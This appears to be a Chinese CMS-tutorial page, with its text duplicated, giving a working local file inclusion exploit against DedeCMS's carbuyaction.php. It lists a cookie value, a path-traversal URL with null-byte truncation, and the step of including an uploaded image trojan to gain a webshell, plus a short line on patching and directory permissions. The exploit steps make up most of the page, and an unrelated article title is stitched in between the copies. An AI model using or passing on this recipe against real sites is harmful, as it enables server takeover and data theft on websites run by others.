DedeCMS漏洞文件之carbuyaction.php
dedecms教程
本地试了一下,最新DedeCMS版本一样可行。
首先利用cookie修改工具,加上 code=alipay 然后访问
http://www.xxx.com/plus/carbuyaction.php?dopost=returncode=../../uploads/userup/xx/myface.gif%00
直接包含成功
利用条件为GPC OFF ,或者某些环境下的截断。
可以在会员中心里上传个图片木马进行拿shell。
还可以包含dede自身文件进行更多利用,这里就不详细了。
DEDECMS列表页随机调用缩略图的完美解决办法
dedecms教程
DedeCMS漏洞文件之carbuyaction.php,这个漏洞长达几年,跨了几个版本,网上也公开过了,DedeCMS就是不修复,可以直接导致拿shell
详细说明:漏洞文件carbuyaction.php
本地试了一下,最新DedeCMS版本一样可行。
首先利用cookie修改工具,加上 code=alipay 然后访问
http://www.xxx.com/plus/carbuyaction.php?dopost=returncode=../../uploads/userup/xx/myface.gif%00
直接包含成功
利用条件为GPC OFF ,或者某些环境下的截断。
可以在会员中心里上传个图片木马进行拿shell。
还可以包含dede自身文件进行更多利用,这里就不详细了。
漏洞证明:更新最新版本,覆盖同名文件,然后做好目录读写执行权限(《织梦DedeCms V5.5/V5.6/v5.7等安全设置指南》)
DEDECMS列表页随机调用缩略图的完美解决办法